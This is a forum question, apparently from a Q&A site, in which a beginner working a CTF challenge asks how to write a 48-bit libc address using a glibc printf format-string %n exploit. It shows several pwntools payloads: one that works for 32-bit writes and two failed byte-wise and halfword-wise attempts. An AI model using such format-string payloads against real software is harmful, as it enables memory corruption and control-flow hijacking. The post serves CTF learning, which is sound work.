# how to write a large value > 32 bits with a format string exploit %n

Tags: exploit, low-level, format-string, ctf, pwntools

I'm working on a challenge that requires me to overwrite a memory address with a libc address, which are around 48 bits usually.
I have the ability to write a 32 bit number into an address but anything larger than that alignment issues start happening and things start breaking.
to write the number 0x8e719f2e into into address target_address i would say
payload = b"%36465x%7$n" + b"%4285x%8$hn" + p64(target_address+2) + p64(target_address)
and it works

say you needed to write a libc address like 0x7f4121347120, how would you do it?

some of my failed attempts include:
trying to write each individual byte in descending order %hhn and "A"s for alignment padding:
0x7f4121347120
payload = b"%32x%7$hhnAAA" + b"%1x%8$hhn" + b"%19x%9$hhn" + b"%7x%10$hhn" + b"%48x%11$hhn" + b"%48x%12$hhn" + p64(ta) + p64(ta+3) + p64(ta+2) + p64(ta+4) + p64(ta+1) + p64(ta+5)
trying to two bytes at a time with %hn:
payload = b"%8500x%7$hnAAAAAA" + b"%20460x%8$hn" + b"%3617x%9$hn" + p64(ta+2) + p64(ta) + p64(ta+4)

and finally: trying to write the whole thing at once which obviously doesn't work and will (speaking from experience) brick your whole system.

don't know what else to try.
both of these payloads segfault the program.

do I have the wrong idea with this. btw i'm a noob with pwn and this site so please don't roast me

the point of my question is how can I write a large value with a format string exploit, any help is much appreciated.

Comment: In case it matters, is this glibc's `printf`?

Comment: yes, glibc version 2.36 if that matters.